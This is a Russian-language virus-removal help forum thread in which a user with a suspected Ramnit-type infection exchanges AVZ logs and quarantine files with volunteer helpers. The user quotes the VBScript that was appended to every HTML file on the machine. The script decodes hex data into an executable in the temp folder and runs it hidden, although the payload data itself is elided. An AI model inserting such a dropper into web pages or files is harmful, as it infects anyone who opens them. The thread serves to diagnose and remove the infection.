Доброго времени суток!
Проверьте пожалуйста логи (есть подозрение на червя типа Ramnit).
Доброго времени суток!
Проверьте пожалуйста логи (есть подозрение на червя типа Ramnit).
Здравствуйте!
Пожалуйста, запакуйте исполняемый файл avz.exe из папки AVZ в архив с паролем virus и пришлите его через красную ссылку "Прислать запрошенный карантин" наверху темы.>>>> Опасно - файл avz.exe изменен, его CRC не прошла контроль по базе безопасных
Результат загрузки:
Файл сохранён как 110401_193706_virus_4d9629629fb7b.zip
Размер файла 714467
MD5 6f9b7f743492f2f80d39aa644c7ba574
Скачайте AVZ 4.35, обновите его базы и переделайте логи
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Сделано
Логи переделать в нормальном режиме
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Логи в нормальном режиме не получаются. Тормозит система и загрузка ЦП под 100%. В процессах всегда 3 раза "iexplore.exe", хотя он не запущен. Даже после того, когда я убрал все 3 процесса, он загружен на 100. Во всех .html (.htm) файлах дописан следующий код:
Просканировал MBAM, нашёл в реестре Backdoor.Bifrose. Но вирус ещё сидит.Код:<html> (html код) </html><SCRIPT Language=VBScript><!-- DropFileName = "vsexplore.exe" WriteData = "Ооооооооочень много цифр" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT>
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 1
- В ходе лечения вредоносные программы в карантинах не обнаружены
Уважаемый(ая) banpa, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.